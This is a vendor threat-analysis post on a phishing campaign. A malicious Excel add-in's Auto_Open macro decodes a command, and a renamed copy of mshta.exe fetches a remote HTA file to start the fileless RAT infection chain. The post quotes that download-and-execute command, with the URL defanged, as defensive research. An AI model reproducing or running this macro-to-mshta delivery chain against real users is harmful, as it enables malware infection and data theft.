Phishing Campaign Delivering Three Fileless Malware:

AveMariaRAT / BitRAT / PandoraHVNC

Fortinet’s FortiGuard Labs captured a phishing campaign that was delivering three fileless malware onto a victim’s device. Once executed, they are able to steal sensitive information from that device.

In this analysis, I’ll reveal how the phishing campaign manages to transfer the fileless malware to the victim’s device, what mechanism it uses to load, deploy, and execute the fileless malware in the target process, and how it maintains persistence on the victim’s device.

Affected platforms: Microsoft Windows
Impacted parties: Microsoft Windows Users
Impact: Controls victim’s device and collects sensitive information
Severity level: Critical

Observing the Phishing Email

The captured phishing email is shown in Figure 1.1. It was disguised as a notification of a payment report from a trusted source.

Figure 1.1 – The phishing email

This email attempts to trick the recipient into opening the attached Excel document for the report detail. As you can see, this phishing email is detected as spam by the FortiMail service and has been marked as “[SPAM detected by FortiMail]” in the Subject line to warn the recipient.

Looking into the Attached Excel Document

The Excel document is named “Remittance-Details-951244.xlam”. It’s an Excel Add-In (*.xlam) file that contains malicious macros. When the recipient starts it in the Microsoft Excel program, a security notice pops up asking the user if they want to enable the macros, as shown in Figure 2.1.

Figure 2.1 – The security notice that launches when opening the Excel document

It contains an auto-start Macro that starts using a VBA (Visual Basic Application) method called “Auto_Open()” when the Excel file is opened.

Going through the VBA code inside the method, I learned that it decodes a command string and executes it using a WMI (Windows Management Instrumentation) object.

Figure 2.2 – The WMI object used to execute a decoded command

Figure 2.2 is a snippet of VBA code of the method “Auto_Open()”,  showing where it is about to create a WMI object to execute the decoded string command “C:\ProgramData\ hxxps://taxfile[.]mediafire[.]com/file/6hxdxdkgeyq0z1o/APRL27[.]htm/file”,  as shown in the bottom of Figure 2.2.

Before that, it copies a local file, “C:\Windows\System32\mshta.exe”, into “C:\ProgramData\” and renames it as “”. “mshta.exe” is a Windows-native binary file designed to execute Microsoft HTML Application (HTA) files. Remember that “C:\ProgramData\” is now the duplicate of “mshta.exe”, which will be used throughout the campaign. To confuse researchers, for example, it uses the copied “” file to download and execute the malicious html file rather than “mshta.exe”.